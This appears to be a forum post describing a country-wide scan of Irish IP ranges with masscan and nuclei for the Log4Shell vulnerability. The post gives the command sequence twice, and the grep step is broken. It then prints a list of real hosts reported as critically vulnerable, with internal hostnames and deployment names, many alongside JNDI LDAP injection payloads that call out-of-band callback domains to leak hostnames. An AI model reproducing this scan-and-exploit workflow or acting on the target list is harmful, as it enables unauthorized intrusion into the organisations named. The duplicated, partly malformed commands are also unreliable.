Been playing around with nuclei and masscan looking for log4shell (CVE-2021-44228) vulnerabilities. Tested on Ireland.
1. sudo masscan -p80,443 -Pn -sS -iL ireland.txt -oL CVE-2021-44228 --rate 10000 --excludefile block.txt
2. grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" > CVE-2021-44228 > CVE-2021-44228_list
3. nuclei -l CVE-2021-44228_list -t nuclei-templates/cves/2021/CVE-2021-44228.yaml > CVE-2021-44228_vuln
cat CVE-2021-44228_vuln:
1. sudo masscan -p80,443 -Pn -sS -iL ireland.txt -oL CVE-2021-44228 --rate 10000 --excludefile block.txt
2. grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" > CVE-2021-44228 > CVE-2021-44228_list
3. nuclei -l CVE-2021-44228_list -t nuclei-templates/cves/2021/CVE-2021-44228.yaml > CVE-2021-44228_vuln
cat CVE-2021-44228_vuln:
Код:
[CVE-2021-44228] [http] [critical] https://108.128.125.92/?x=${jndi:ldap://${hostName}.uri.cg48b5e1sv3a8th01rh06ycgtruxzkg6n.oast.pro/a} [3.251.104.179,uri,dev3]
[CVE-2021-44228] [http] [critical] https://108.128.246.186/ [3.248.180.105,accept,beta-flight-stats-api-01]
[CVE-2021-44228] [http] [critical] https://108.128.8.219/ [99.80.34.103,cookievalue,ip-172-16-9-232.eu-west-1.compute.internal]
[CVE-2021-44228] [http] [critical] https://138.91.52.207/?x=${jndi:ldap://${hostName}.uri.cg48b5e1sv3a8th01rh0txmx6sqqxmhys.oast.pro/a} [74.125.181.196,uri,7d]
[CVE-2021-44228] [http] [critical] https://176.34.81.42/ [3.248.180.71,accept,ip-172-31-18-155]
[CVE-2021-44228] [http] [critical] http://193.203.126.148/ [162.158.37.65,accept,Celsmptest2]
[CVE-2021-44228] [http] [critical] https://23.100.61.80/?x=${jndi:ldap://${hostName}.uri.cg48b5e1sv3a8th01rh01mwws5dky54ju.oast.pro/a} [13.74.105.103,uri,5875db00c902]
[CVE-2021-44228] [http] [critical] https://34.240.145.119/ [3.251.128.113,xforwardedfor,ip-172-30-8-215.eu-west-1.compute.internal]
[CVE-2021-44228] [http] [critical] https://34.241.35.91/?x=${jndi:ldap://${47.111.0.119}.uri.cg48b5e1sv3a8th01rh09yk3sj4zehyzu.oast.pro/a} [3.248.186.147,uri,IBEUINTEUI02]
[CVE-2021-44228] [http] [critical] https://34.241.70.74/?x=${jndi:ldap://${hostName}.uri.cg48b5e1sv3a8th01rh0atwgaux63xd8u.oast.pro/a} [3.251.105.97,uri,ip-10-3-1-91.eu-west-1.compute.internal]
[CVE-2021-44228] [http] [critical] https://34.242.44.98/ [34.242.153.186,accept,feed-aggregator-deploy-75b9894fd6-lfqgm]
[CVE-2021-44228] [http] [critical] https://34.244.22.48/?x=${jndi:ldap://${hostName}.uri.cg48b5e1sv3a8th01rh0geek68ijtjabg.oast.pro/a} [3.248.180.97,uri,ip-10-0-1-10]
[CVE-2021-44228] [http] [critical] https://34.247.146.131/ [3.248.180.101,accept,production-flight-stats-api-01]
[CVE-2021-44228] [http] [critical] https://34.247.210.208/ [3.251.120.112,cookievalue,wso2am-pattern-2-am-1-deployment-7789dd958c-h962l]
[CVE-2021-44228] [http] [critical] https://34.247.42.67/?x=${jndi:ldap://${hostName}.uri.cg48b5e1sv3a8th01rh0atypc5gw16ahu.oast.pro/a} [3.251.104.240,uri,PLNPWIAM202.netpost]
[CVE-2021-44228] [http] [critical] https://34.248.43.49/?x=${jndi:ldap://${hostName}.uri.cg48b5e1sv3a8th01rh0rbbht6r5wzcj3.oast.pro/a} [3.248.180.174,uri,ip-10-30-9-153.eu-west-1.compute.internal]
[CVE-2021-44228] [http] [critical] https://34.248.47.249/?x=${jndi:ldap://${hostName}.uri.cg48b5e1sv3a8th01rh0r7rst96o67bhb.oast.pro/a} [3.251.104.184,uri,mediadebug-ir-02]
[CVE-2021-44228] [http] [critical] https://34.249.174.78/ [3.251.105.68,accept,c894ae1f505e]
[CVE-2021-44228] [http] [critical] https://34.249.33.155/ [3.248.186.242,xforwardedfor,ip-172-30-8-215.eu-west-1.compute.internal]
[CVE-2021-44228] [http] [critical] http://20.54.38.107/?x=${jndi:ldap://${hostName}.uri.cg4s3t3cktidk3901rh06gsrumi3b5ef8.oast.site/a} [13.69.225.75,[uri,[pilot-heim-pulsar-proxy-0.pilot-heim-pulsar-proxy.default.svc.cluster.local]
[CVE-2021-44228] [http] [critical] http://20.54.72.112/?x=${jndi:ldap://${hostName}.uri.cg4s3t3cktidk3901rh0padkyuu7xmtxe.oast.site/a} [52.138.225.85,[uri,[adobe-nh]
[CVE-2021-44228] [http] [critical] http://20.82.178.253/?x=${jndi:ldap://${hostName}.uri.cg4s3t3cktidk3901rh0sb61erhxr1pn9.oast.site/a} [13.74.105.73,[uri,[adobe-cc]
[CVE-2021-44228] [http] [critical] https://23.100.61.80/?x=${jndi:ldap://${hostName}.uri.cg4s3t3cktidk3901rh05ne4kw84khf8c.oast.site/a} [13.69.224.90,[uri,[5875db00c902]
[CVE-2021-44228] [http] [critical] http://3.252.27.168/ [3.251.104.176,[xforwardedfor,[ctaws-euw1-log1.ec2]
[CVE-2021-44228] [http] [critical] https://34.247.210.208/ [3.251.120.104,[cookievalue,[wso2am-pattern-2-am-2-deployment-5748697496-ln6wm]
[CVE-2021-44228] [http] [critical] https://40.67.244.9/ [13.69.224.100,[accept,[PRODUCTION]
[CVE-2021-44228] [http] [critical] https://40.69.214.45/ [13.74.202.0,[cookievalue,[KeisyFitxatgeVM]
[CVE-2021-44228] [http] [critical] https://40.87.142.17/ [13.69.224.122,[accept,[Biostar2]
[CVE-2021-44228] [http] [critical] https://40.87.142.50/ [13.69.224.94,[accept,[Biostar1]
[CVE-2021-44228] [http] [critical] https://52.164.186.50/ [83.48.66.106,[accept,[DC02]
[CVE-2021-44228] [http] [critical] https://52.169.186.178/ [13.69.225.74,[accept,[QTSserver]
[CVE-2021-44228] [http] [critical] https://52.18.120.219/ [3.248.186.240,[cookievalue,[ip-172-31-43-15]
[CVE-2021-44228] [http] [critical] http://54.155.229.176/ [3.251.95.100,[xforwardedfor,[ip-10-0-161-127.eu-west-1.compute.internal]
[CVE-2021-44228] [http] [critical] https://63.32.26.16/ [3.248.180.227,[accept,[ip-172-30-0-68]
[CVE-2021-44228] [http] [critical] http://87.34.154.15/ [87.32.4.43,[cookievalue,[MI-LIBSRV]
[CVE-2021-44228] [http] [critical] https://99.81.167.207/ [34.242.153.166,[accept,[feed-aggregator-deploy-75b9894fd6-vsr7s]
Последнее редактирование: